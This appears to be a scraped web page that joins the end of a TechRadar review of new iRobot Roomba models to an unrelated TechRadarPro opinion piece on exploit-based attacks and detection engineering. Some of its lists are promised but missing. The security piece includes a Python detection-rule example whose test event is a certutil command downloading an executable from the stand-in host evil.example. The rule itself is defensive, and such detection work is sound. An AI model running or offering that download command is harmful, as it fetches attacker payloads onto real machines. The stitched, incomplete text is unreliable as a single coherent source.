The Roborock Qrevo Slim and Saros 10R do away with a puck entirely, but to compensate the brand has engineered an entirely new navigation method, called StarSight, to ensure navigation isn't compromised. I'm no engineer, but surely they wouldn't go to all that trouble if you could just chop the puck off with no impact.
The iRobot spokesperson I chatted with assured me there would be no compromise in navigation accuracy – they told me they were testing two bots, one with the puck and one without, and they were both behaving the same way. I'll be really interested to test this out and see for myself.
#2. The continued presence of the Combo 10 MaxMy other slight misgiving is that the current 'Max' segment consists only of the Combo 10 Max. It only launched in July 2024, so perhaps iRobot felt it was too soon to scrap it. However, as what should be the shining star of the Roomba fleet, it's underwhelming.
It was generally not well received – we awarded it a less-than-ideal 3 stars in our Roomba Combo 10 Max review, with our tester complaining of painfully slow mapping (no LiDAR here) and sub-standard mop cleaning. Both of these aspects have been improved on in the new Plus models, which look far more promising to me.
Overall, though, it's promising news from iRobot, and I appreciate that the brand has been bold enough to accept that what it was doing wasn't working, and go for a big reboot. I'm excited to get these new models into my flat and test the new features out for myself.
In today's rapidly evolving threat landscape, cybersecurity is more crucial than ever. Advanced persistent threats (APTs) and sophisticated attacker tactics are now part of the norm. Modern attackers are faster and more creative, taking mere hours to move from initial compromise to reaching their objectives.
Yet, detecting an attacker often takes days—sometimes even months. This speed disparity highlights the urgent need for a more robust and intelligent approach to cyber defense.
The Rise of Exploit-Based AttacksOne of the biggest challenges facing security teams is the shift towards exploit-based attacks. These attacks leverage vulnerabilities in software and systems, often taking advantage of zero-day exploits or previously unknown weaknesses. Unlike traditional malware attacks, exploit-based attacks are much harder to identify.
Recent studies highlight that vulnerabilities, not just phishing, have become a primary attack vector. Mandiant reports that exploit-based attacks have overtaken email-based methods, and CrowdStrike notes that 75% of threats now leverage “living off the land” (LotL) tools rather than traditional malware. These methods exploit vulnerabilities in existing systems and applications, often taking advantage of overlooked entry points. The growing prevalence of zero-days and AI-powered exploit discovery further complicates the challenge for defenders.
The Critical Role of DetectionTo address these challenges, organizations need to adopt a new approach to security. Effective detection is essential, especially with the increasing number of malware-less attacks. According to Accenture, less than 1% of an organization’s detection rules are fully effective. Many detection rules remain outdated, resulting in a flood of false positives and missed detection opportunities.
Detection must focus on adversary behaviors, not static indicators like malware hashes. The shelf life for these ephemeral indicators is short. Behavior-based detection tied to adversary tactics, techniques, and procedures (TTPs) gives organizations a chance to detect and mitigate threats in real time, meeting compliance requirements from regulations like GDPR, PCI, HIPAA, and FISMA.
Why Improving Detection is ChallengingDetection engineering is the discipline of transforming adversary knowledge into actionable detection rules. This is a continuous cycle: researching relevant threats, building specific detection logic, and validating those detections to ensure effectiveness. But many organizations struggle here. Writing, testing, and maintaining hundreds of detection rules can overwhelm even the most mature security teams. Tests can be written poorly, and when they aren’t validated accurately, they lead to gaps in coverage or false positives that bury real alerts.
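To make the cycle concrete, here is a minimal, illustrative sketch of the research-build-validate loop described above, expressed in Python. The rule, event fields, and telemetry are hypothetical examples invented for this sketch (flagging a common "living off the land" pattern, certutil abused as a downloader), not the logic of any real product or vendor.

```python
# Toy sketch of detection engineering: encode one behavior-based rule,
# then validate it against known-bad and known-good sample telemetry
# before deployment. All event data below is fabricated for illustration.

from dataclasses import dataclass

@dataclass
class Event:
    process: str
    command_line: str

def detect_lotl_download(event: Event) -> bool:
    """Flag a classic LotL behavior: certutil invoked as a downloader."""
    cmd = event.command_line.lower()
    return (
        event.process.lower() == "certutil.exe"
        and "urlcache" in cmd
        and "http" in cmd
    )

# Validation step: a rule that misses the behavior leaves a coverage gap;
# one that fires on legitimate use buries analysts in false positives.
malicious = Event("certutil.exe",
                  "certutil.exe -urlcache -f http://evil.example/p.exe p.exe")
benign = Event("certutil.exe", "certutil.exe -verify cert.cer")

assert detect_lotl_download(malicious) is True
assert detect_lotl_download(benign) is False
print("rule validated")
```

The point of the sketch is the shape of the loop, not the rule itself: each detection encodes a behavior (a TTP) rather than a static indicator like a file hash, and each is exercised against both malicious and benign samples before it ever reaches production.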
Effective detection is not just about having the right rules in place. It's also about having the right processes and technologies to support those rules. This includes:
Organizations looking to enhance their detection capabilities should consider these four questions:
By implementing these measures, organizations can significantly improve their ability to detect and respond to cyberattacks. However, it's important to remember that security is an ongoing process, not a one-time event. Attackers are constantly evolving their methods, so security teams must continuously adapt their defenses to stay ahead of the curve.
In addition to the technical measures outlined above, organizations also need to focus on building a strong security culture. This means educating employees about cybersecurity risks and best practices, and empowering them to report suspicious activity. A strong security culture can help to prevent attacks in the first place, and it can also help to ensure that incidents are identified and responded to quickly.
We've made a list of the best network monitoring tools.
This article was produced as part of TechRadarPro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro